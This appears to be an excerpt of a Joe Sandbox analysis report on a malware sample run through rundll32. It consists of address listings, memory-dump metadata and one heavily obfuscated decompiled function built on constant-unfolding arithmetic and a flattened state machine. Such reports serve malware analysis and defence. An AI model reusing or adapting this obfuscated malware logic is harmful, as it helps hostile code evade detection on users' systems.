                                                                                                                                    0x002df99c
                                                                                                                                    0x002df9a3
                                                                                                                                    0x002df9ae
                                                                                                                                    0x002df9b9
                                                                                                                                    0x002df9c1
                                                                                                                                    0x002df9c6
                                                                                                                                    0x002df9ca
                                                                                                                                    0x002df9cf
                                                                                                                                    0x002df9d7
                                                                                                                                    0x002df9e4
                                                                                                                                    0x002df9e8
                                                                                                                                    0x002df9ed
                                                                                                                                    0x002df9f2
                                                                                                                                    0x002df9fa
                                                                                                                                    0x002dfa05
                                                                                                                                    0x002dfa10
                                                                                                                                    0x002dfa1b
                                                                                                                                    0x002dfa26
                                                                                                                                    0x002dfa31
                                                                                                                                    0x002dfa3c
                                                                                                                                    0x002dfa47
                                                                                                                                    0x002dfa52
                                                                                                                                    0x002dfa5d
                                                                                                                                    0x002dfa68
                                                                                                                                    0x002dfa73
                                                                                                                                    0x002dfa7b
                                                                                                                                    0x002dfa8b
                                                                                                                                    0x002dfa8f
                                                                                                                                    0x002dfa97
                                                                                                                                    0x002dfaa7
                                                                                                                                    0x002dfaab
                                                                                                                                    0x002dfab0
                                                                                                                                    0x002dfab5
                                                                                                                                    0x002dfabd
                                                                                                                                    0x002dfac5
                                                                                                                                    0x002dfacd
                                                                                                                                    0x002dfad2
                                                                                                                                    0x002dfada
                                                                                                                                    0x002dfae2
                                                                                                                                    0x002dfaea
                                                                                                                                    0x002dfaf2
                                                                                                                                    0x002dfafa
                                                                                                                                    0x002dfb05
                                                                                                                                    0x002dfb0d
                                                                                                                                    0x002dfb18
                                                                                                                                    0x002dfb25
                                                                                                                                    0x002dfb29
                                                                                                                                    0x002dfb31
                                                                                                                                    0x002dfb39
                                                                                                                                    0x002dfb41
                                                                                                                                    0x002dfb49
                                                                                                                                    0x002dfb4e
                                                                                                                                    0x002dfb5c
                                                                                                                                    0x002dfb62
                                                                                                                                    0x002dfb6a
                                                                                                                                    0x002dfb79
                                                                                                                                    0x002dfb7c
                                                                                                                                    0x002dfb83
                                                                                                                                    0x002dfb87
                                                                                                                                    0x002dfb8c
                                                                                                                                    0x002dfb94
                                                                                                                                    0x002dfbaa
                                                                                                                                    0x002dfbb1
                                                                                                                                    0x002dfbb8
                                                                                                                                    0x002dfbc3
                                                                                                                                    0x002dfbd0
                                                                                                                                    0x002dfbd1
                                                                                                                                    0x002dfbda
                                                                                                                                    0x002dfbde
                                                                                                                                    0x002dfbe6
                                                                                                                                    0x002dfbee
                                                                                                                                    0x002dfc03
                                                                                                                                    0x002dfc07
                                                                                                                                    0x002dfc0f
                                                                                                                                    0x002dfc17
                                                                                                                                    0x002dfc24
                                                                                                                                    0x002dfc28
                                                                                                                                    0x002dfc30
                                                                                                                                    0x002dfc35
                                                                                                                                    0x002dfc3d
                                                                                                                                    0x002dfc45
                                                                                                                                    0x002dfc4a
                                                                                                                                    0x002dfc52
                                                                                                                                    0x002dfc5a
                                                                                                                                    0x002dfc62
                                                                                                                                    0x002dfc67
                                                                                                                                    0x002dfc6f
                                                                                                                                    0x002dfc74
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc81
                                                                                                                                    0x002dfc87
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfc8d
                                                                                                                                    0x002dffc3
                                                                                                                                    0x002dffcc
                                                                                                                                    0x002dffd3
                                                                                                                                    0x002e000b
                                                                                                                                    0x002e001f
                                                                                                                                    0x002e0024
                                                                                                                                    0x002e0030
                                                                                                                                    0x002e0032
                                                                                                                                    0x00000000
                                                                                                                                    0x002e0032
                                                                                                                                    0x002dfc99
                                                                                                                                    0x002dfdb2
                                                                                                                                    0x002dfdc5
                                                                                                                                    0x002dfdc6
                                                                                                                                    0x002dfdcc
                                                                                                                                    0x002dfdd4
                                                                                                                                    0x002dfdd6
                                                                                                                                    0x002dfddc
                                                                                                                                    0x002dfde0
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfde0
                                                                                                                                    0x002dfca5
                                                                                                                                    0x002dfd4c
                                                                                                                                    0x002dfd55
                                                                                                                                    0x002dfd60
                                                                                                                                    0x002dfd75
                                                                                                                                    0x002dfd76
                                                                                                                                    0x002dfd77
                                                                                                                                    0x002dfd78
                                                                                                                                    0x002dfd8a
                                                                                                                                    0x002dfd9c
                                                                                                                                    0x002dfda1
                                                                                                                                    0x002dfda4
                                                                                                                                    0x002dfd0b
                                                                                                                                    0x002dfd0b
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfc7c
                                                                                                                                    0x002dfcb1
                                                                                                                                    0x002dfcb9
                                                                                                                                    0x002dfcdd
                                                                                                                                    0x002dfce2
                                                                                                                                    0x002dfcea
                                                                                                                                    0x002dfcfa
                                                                                                                                    0x002dfcfb
                                                                                                                                    0x002dfcfc
                                                                                                                                    0x002dfcfe
                                                                                                                                    0x002dfd03
                                                                                                                                    0x002dfd08
                                                                                                                                    0x002dfd08
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcbb
                                                                                                                                    0x002dfcc1
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x00000000
                                                                                                                                    0x002dfcc7
                                                                                                                                    0x002dfcc1
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dffc2
                                                                                                                                    0x002dfd1b
                                                                                                                                    0x002dfd2d
                                                                                                                                    0x002dfd2e
                                                                                                                                    0x002dfd2f
                                                                                                                                    0x002dfd34
                                                                                                                                    0x002dfd3d

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                    • API String ID: 0-2624470838
                                                                                                                                    • Opcode ID: bd8a88468cf92ce3861dc5f7afff0580ffadab2071d40ce31edf980b112aa763
                                                                                                                                    • Instruction ID: 63513d6c32ed8c89f468583e89b99ee87d76b8f8ee21ac63dc4ec8f2a3ccd5de
                                                                                                                                    • Opcode Fuzzy Hash: bd8a88468cf92ce3861dc5f7afff0580ffadab2071d40ce31edf980b112aa763
                                                                                                                                    • Instruction Fuzzy Hash: 4E5231715093819FD3B8CF25C58AB8BFBE1BBC5358F10891EE19A96260D7B48949CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002CD6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v4;
                                                                                                                                    				char _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				unsigned int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				intOrPtr _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				intOrPtr _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				intOrPtr _t400;
                                                                                                                                    				void* _t407;
                                                                                                                                    				signed int _t410;
                                                                                                                                    				intOrPtr _t421;
                                                                                                                                    				signed int _t423;
                                                                                                                                    				signed int _t424;
                                                                                                                                    				signed int _t425;
                                                                                                                                    				signed int _t426;
                                                                                                                                    				signed int _t427;
                                                                                                                                    				signed int _t428;
                                                                                                                                    				signed int _t429;
                                                                                                                                    				signed int _t430;
                                                                                                                                    				signed int _t431;
                                                                                                                                    				signed int _t432;
                                                                                                                                    				signed int _t433;
                                                                                                                                    				intOrPtr _t434;
                                                                                                                                    				void* _t473;
                                                                                                                                    				intOrPtr* _t482;
                                                                                                                                    				signed int _t485;
                                                                                                                                    				signed int* _t491;
                                                                                                                                    				void* _t493;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_v16 = __edx;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(__edx);
                                                                                                                                    				_v72 = 0xfd05e7;
                                                                                                                                    				_t491 =  &(( &_v192)[6]);
                                                                                                                                    				_v72 = _v72 | 0xfdc7c414;
                                                                                                                                    				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                                    				_t489 = 0;
                                                                                                                                    				_v128 = 0x159cf;
                                                                                                                                    				_t421 = 0;
                                                                                                                                    				_v128 = _v128 + 0x2543;
                                                                                                                                    				_t485 = 0x8939926;
                                                                                                                                    				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                                    				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                                    				_v188 = 0xc0a375;
                                                                                                                                    				_t423 = 0x5a;
                                                                                                                                    				_v188 = _v188 / _t423;
                                                                                                                                    				_v188 = _v188 + 0xf5e3;
                                                                                                                                    				_v188 = _v188 + 0xffffba7d;
                                                                                                                                    				_v188 = _v188 ^ 0x0002d452;
                                                                                                                                    				_v192 = 0xeb0e91;
                                                                                                                                    				_v192 = _v192 << 0xb;
                                                                                                                                    				_v192 = _v192 >> 0xd;
                                                                                                                                    				_v192 = _v192 | 0x4be38997;
                                                                                                                                    				_v192 = _v192 ^ 0x4be25280;
                                                                                                                                    				_v52 = 0x3397e5;
                                                                                                                                    				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                                    				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                                    				_v60 = 0x140ff9;
                                                                                                                                    				_t424 = 6;
                                                                                                                                    				_v60 = _v60 / _t424;
                                                                                                                                    				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                                    				_v168 = 0x6059cb;
                                                                                                                                    				_t425 = 0x1a;
                                                                                                                                    				_v168 = _v168 * 0x7f;
                                                                                                                                    				_v168 = _v168 / _t425;
                                                                                                                                    				_v168 = _v168 * 0x21;
                                                                                                                                    				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                                    				_v112 = 0x1e6ccd;
                                                                                                                                    				_v112 = _v112 << 0xc;
                                                                                                                                    				_v112 = _v112 + 0xffff3925;
                                                                                                                                    				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                                    				_v44 = 0xb8d15a;
                                                                                                                                    				_v44 = _v44 >> 0xb;
                                                                                                                                    				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                                    				_v172 = 0x2478d;
                                                                                                                                    				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                                    				_v172 = _v172 >> 0xc;
                                                                                                                                    				_v172 = _v172 | 0x6f66efc5;
                                                                                                                                    				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                                    				_v116 = 0x51a99f;
                                                                                                                                    				_v116 = _v116 | 0x1f129b6c;
                                                                                                                                    				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                                    				_v116 = _v116 ^ 0xde47442a;
                                                                                                                                    				_v132 = 0x216e1a;
                                                                                                                                    				_v132 = _v132 + 0xffff43fb;
                                                                                                                                    				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                                    				_v132 = _v132 ^ 0x702542ff;
                                                                                                                                    				_v84 = 0xc91edc;
                                                                                                                                    				_t426 = 0x5e;
                                                                                                                                    				_v84 = _v84 / _t426;
                                                                                                                                    				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                                    				_v164 = 0xa7de11;
                                                                                                                                    				_v164 = _v164 + 0xffff6841;
                                                                                                                                    				_v164 = _v164 >> 4;
                                                                                                                                    				_v164 = _v164 << 3;
                                                                                                                                    				_v164 = _v164 ^ 0x005f8816;
                                                                                                                                    				_v108 = 0xdd6066;
                                                                                                                                    				_v108 = _v108 >> 8;
                                                                                                                                    				_v108 = _v108 << 8;
                                                                                                                                    				_v108 = _v108 ^ 0x00d87344;
                                                                                                                                    				_v92 = 0x21cc88;
                                                                                                                                    				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                                    				_v92 = _v92 ^ 0xd8329727;
                                                                                                                                    				_v96 = 0xbd6d4e;
                                                                                                                                    				_t427 = 0x26;
                                                                                                                                    				_v96 = _v96 / _t427;
                                                                                                                                    				_v96 = _v96 ^ 0x00061825;
                                                                                                                                    				_v24 = 0x6502ac;
                                                                                                                                    				_v24 = _v24 << 4;
                                                                                                                                    				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                                    				_v56 = 0x642336;
                                                                                                                                    				_v56 = _v56 + 0xffffd3db;
                                                                                                                                    				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                                    				_v68 = 0x348f1;
                                                                                                                                    				_t428 = 0x55;
                                                                                                                                    				_v68 = _v68 / _t428;
                                                                                                                                    				_v68 = _v68 ^ 0x0008f449;
                                                                                                                                    				_v76 = 0x3c74f1;
                                                                                                                                    				_v76 = _v76 + 0xffff407e;
                                                                                                                                    				_v76 = _v76 ^ 0x003b6445;
                                                                                                                                    				_v88 = 0xc452b0;
                                                                                                                                    				_v88 = _v88 + 0xffff3a6d;
                                                                                                                                    				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                                    				_v48 = 0xc68c2;
                                                                                                                                    				_t429 = 0x57;
                                                                                                                                    				_v48 = _v48 / _t429;
                                                                                                                                    				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                                    				_v100 = 0x631361;
                                                                                                                                    				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                                    				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                                    				_v148 = 0x1761a;
                                                                                                                                    				_v148 = _v148 ^ 0xebf93349;
                                                                                                                                    				_v148 = _v148 >> 4;
                                                                                                                                    				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                                    				_v40 = 0xe5378a;
                                                                                                                                    				_v40 = _v40 >> 2;
                                                                                                                                    				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                                    				_v140 = 0x73545;
                                                                                                                                    				_t430 = 0x61;
                                                                                                                                    				_v140 = _v140 * 0x21;
                                                                                                                                    				_v140 = _v140 / _t430;
                                                                                                                                    				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                                    				_v80 = 0x39d04;
                                                                                                                                    				_v80 = _v80 >> 4;
                                                                                                                                    				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                                    				_v156 = 0x1ba0aa;
                                                                                                                                    				_v156 = _v156 + 0x716e;
                                                                                                                                    				_v156 = _v156 << 0xd;
                                                                                                                                    				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                                    				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                                    				_v20 = 0xda4179;
                                                                                                                                    				_t431 = 0x27;
                                                                                                                                    				_t482 = _v16;
                                                                                                                                    				_v20 = _v20 / _t431;
                                                                                                                                    				_v20 = _v20 ^ 0x00092493;
                                                                                                                                    				_v32 = 0x6dc25;
                                                                                                                                    				_v32 = _v32 >> 0xf;
                                                                                                                                    				_v32 = _v32 ^ 0x0008149e;
                                                                                                                                    				_v180 = 0x3ec4dc;
                                                                                                                                    				_v180 = _v180 >> 5;
                                                                                                                                    				_t432 = 0x70;
                                                                                                                                    				_v180 = _v180 / _t432;
                                                                                                                                    				_v180 = _v180 + 0xffff18e8;
                                                                                                                                    				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                                    				_v64 = 0xea19a3;
                                                                                                                                    				_v64 = _v64 | 0xee52e837;
                                                                                                                                    				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                                    				_v28 = 0xcaf9fa;
                                                                                                                                    				_v28 = _v28 >> 0xe;
                                                                                                                                    				_v28 = _v28 ^ 0x000e6f4e;
                                                                                                                                    				_v120 = 0x563e36;
                                                                                                                                    				_v120 = _v120 >> 0xe;
                                                                                                                                    				_v120 = _v120 << 5;
                                                                                                                                    				_v120 = _v120 ^ 0x00027d23;
                                                                                                                                    				_v176 = 0x87c40f;
                                                                                                                                    				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                                    				_v176 = _v176 + 0xffff7429;
                                                                                                                                    				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                                    				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                                    				_v184 = 0x47488d;
                                                                                                                                    				_v184 = _v184 >> 0xf;
                                                                                                                                    				_v184 = _v184 << 0xf;
                                                                                                                                    				_v184 = _v184 << 1;
                                                                                                                                    				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                                    				_v136 = 0xb24629;
                                                                                                                                    				_v136 = _v136 | 0x7ef33f67;
                                                                                                                                    				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                                    				_v144 = 0xba01aa;
                                                                                                                                    				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                                    				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                                    				_v124 = 0xbe6d5e;
                                                                                                                                    				_v124 = _v124 + 0xffff96e9;
                                                                                                                                    				_v124 = _v124 | 0xcf3d3218;
                                                                                                                                    				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                                    				_v36 = 0xa69a94;
                                                                                                                                    				_v36 = _v36 + 0xffffed5e;
                                                                                                                                    				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                                    				_v104 = 0xa8033b;
                                                                                                                                    				_t433 = 9;
                                                                                                                                    				_v104 = _v104 / _t433;
                                                                                                                                    				_v104 = _v104 >> 6;
                                                                                                                                    				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t434 = _v160;
                                                                                                                                    					while(1) {
                                                                                                                                    						_t400 = _v152;
                                                                                                                                    						while(1) {
                                                                                                                                    							L3:
                                                                                                                                    							_t493 = _t485 - 0xa1723c1;
                                                                                                                                    							if(_t493 > 0) {
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    							L4:
                                                                                                                                    							if(_t493 == 0) {
                                                                                                                                    								E002D8519(_v144, _v124, _t489);
                                                                                                                                    								_t485 = 0x4b7559b;
                                                                                                                                    								goto L17;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t485 == 0x4b7559b) {
                                                                                                                                    									return E002D8519(_v36, _v104, _t421);
                                                                                                                                    								}
                                                                                                                                    								if(_t485 == 0x4ed616e) {
                                                                                                                                    									_t441 = _v172;
                                                                                                                                    									_t407 = E002D16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                                    									_t491 =  &(_t491[0x12]);
                                                                                                                                    									if(_t407 == 0) {
                                                                                                                                    										L16:
                                                                                                                                    										_t485 = 0xa1723c1;
                                                                                                                                    										L17:
                                                                                                                                    										_t400 = _v152;
                                                                                                                                    									} else {
                                                                                                                                    										_t410 = E002DD25E(_t441);
                                                                                                                                    										_t485 = 0x9a40434;
                                                                                                                                    										_t400 = _v12 * 0x2c + _t421;
                                                                                                                                    										_v152 = _t400;
                                                                                                                                    										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                                    									}
                                                                                                                                    									_t434 = _v160;
                                                                                                                                    									_t473 = 0x6a50b97;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t485 == _t473) {
                                                                                                                                    										E002D2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                                    										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                                    										_t400 = E002D8F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                                    										_t491 =  &(_t491[0xb]);
                                                                                                                                    										L30:
                                                                                                                                    										_t473 = 0x6a50b97;
                                                                                                                                    										goto L31;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t485 == 0x8939926) {
                                                                                                                                    											_t485 = 0xe60f9b1;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t485 != 0x9a40434) {
                                                                                                                                    												L31:
                                                                                                                                    												if(_t485 != 0x88fb243) {
                                                                                                                                    													goto L1;
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t434 = E002C42C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                                    												_t491 =  &(_t491[5]);
                                                                                                                                    												_v160 = _t434;
                                                                                                                                    												_t473 = 0x6a50b97;
                                                                                                                                    												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                                    												_t400 = _v152;
                                                                                                                                    												while(1) {
                                                                                                                                    													L3:
                                                                                                                                    													_t493 = _t485 - 0xa1723c1;
                                                                                                                                    													if(_t493 > 0) {
                                                                                                                                    														goto L19;
                                                                                                                                    													}
                                                                                                                                    													goto L4;
                                                                                                                                    												}
                                                                                                                                    												goto L19;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L34:
                                                                                                                                    							return _t400;
                                                                                                                                    							L19:
                                                                                                                                    							if(_t485 == 0xaf524c8) {
                                                                                                                                    								_push(_t434);
                                                                                                                                    								_push(_t434);
                                                                                                                                    								_t400 = E002C7FF2(0x2000);
                                                                                                                                    								_t489 = _t400;
                                                                                                                                    								if(_t400 == 0) {
                                                                                                                                    									_t485 = 0x4b7559b;
                                                                                                                                    									goto L30;
                                                                                                                                    								} else {
                                                                                                                                    									_t485 = 0x4ed616e;
                                                                                                                                    									goto L17;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t485 == 0xb29ddc7) {
                                                                                                                                    									_t482 = _t482 + 0x2c;
                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                    									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									_t400 = 0xd1a593f;
                                                                                                                                    									if(_t485 == 0xd1a593f) {
                                                                                                                                    										E002CDF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                                    										_t491 =  &(_t491[5]);
                                                                                                                                    										goto L16;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t485 != 0xe60f9b1) {
                                                                                                                                    											goto L31;
                                                                                                                                    										} else {
                                                                                                                                    											_push(_t434);
                                                                                                                                    											_push(_t434);
                                                                                                                                    											_t400 = E002C7FF2(0x20000);
                                                                                                                                    											_t421 = 0xd1a593f;
                                                                                                                                    											if(0xd1a593f != 0) {
                                                                                                                                    												_t485 = 0xaf524c8;
                                                                                                                                    												goto L17;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							goto L34;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca2
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcb6
                                                                                                                                    0x002cdcb6
                                                                                                                                    0x002cde66
                                                                                                                                    0x002cde6c
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcbc
                                                                                                                                    0x002cdcc2
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf63
                                                                                                                                    0x002cdcce
                                                                                                                                    0x002cde01
                                                                                                                                    0x002cde05
                                                                                                                                    0x002cde0a
                                                                                                                                    0x002cde0f
                                                                                                                                    0x002cde52
                                                                                                                                    0x002cde52
                                                                                                                                    0x002cde57
                                                                                                                                    0x002cde57
                                                                                                                                    0x002cde11
                                                                                                                                    0x002cde1f
                                                                                                                                    0x002cde27
                                                                                                                                    0x002cde39
                                                                                                                                    0x002cde3d
                                                                                                                                    0x002cde41
                                                                                                                                    0x002cde41
                                                                                                                                    0x002cde44
                                                                                                                                    0x002cde48
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcd4
                                                                                                                                    0x002cdcd6
                                                                                                                                    0x002cdd6a
                                                                                                                                    0x002cdd91
                                                                                                                                    0x002cdd9b
                                                                                                                                    0x002cdda0
                                                                                                                                    0x002cdf40
                                                                                                                                    0x002cdf40
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcd8
                                                                                                                                    0x002cdcde
                                                                                                                                    0x002cdd31
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdce0
                                                                                                                                    0x002cdce6
                                                                                                                                    0x002cdf45
                                                                                                                                    0x002cdf4b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf4d
                                                                                                                                    0x002cdcec
                                                                                                                                    0x002cdd14
                                                                                                                                    0x002cdd16
                                                                                                                                    0x002cdd1b
                                                                                                                                    0x002cdd24
                                                                                                                                    0x002cdd29
                                                                                                                                    0x002cdca6
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdce6
                                                                                                                                    0x002cdcde
                                                                                                                                    0x002cdcd6
                                                                                                                                    0x002cdcce
                                                                                                                                    0x002cdf6e
                                                                                                                                    0x002cdf6e
                                                                                                                                    0x002cde73
                                                                                                                                    0x002cde79
                                                                                                                                    0x002cdf22
                                                                                                                                    0x002cdf23
                                                                                                                                    0x002cdf24
                                                                                                                                    0x002cdf29
                                                                                                                                    0x002cdf2f
                                                                                                                                    0x002cdf3b
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf31
                                                                                                                                    0x002cdf31
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdf31
                                                                                                                                    0x002cde7f
                                                                                                                                    0x002cde85
                                                                                                                                    0x002cdef6
                                                                                                                                    0x002cdefb
                                                                                                                                    0x002cdf03
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde87
                                                                                                                                    0x002cde87
                                                                                                                                    0x002cde8e
                                                                                                                                    0x002cdee9
                                                                                                                                    0x002cdeee
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde90
                                                                                                                                    0x002cde96
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde9c
                                                                                                                                    0x002cdeb3
                                                                                                                                    0x002cdeb4
                                                                                                                                    0x002cdeb5
                                                                                                                                    0x002cdeba
                                                                                                                                    0x002cdec0
                                                                                                                                    0x002cdec6
                                                                                                                                    0x00000000
                                                                                                                                    0x002cdec6
                                                                                                                                    0x002cdec0
                                                                                                                                    0x002cde96
                                                                                                                                    0x002cde8e
                                                                                                                                    0x002cde85
                                                                                                                                    0x00000000
                                                                                                                                    0x002cde79
                                                                                                                                    0x002cdcaa
                                                                                                                                    0x002cdca6

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
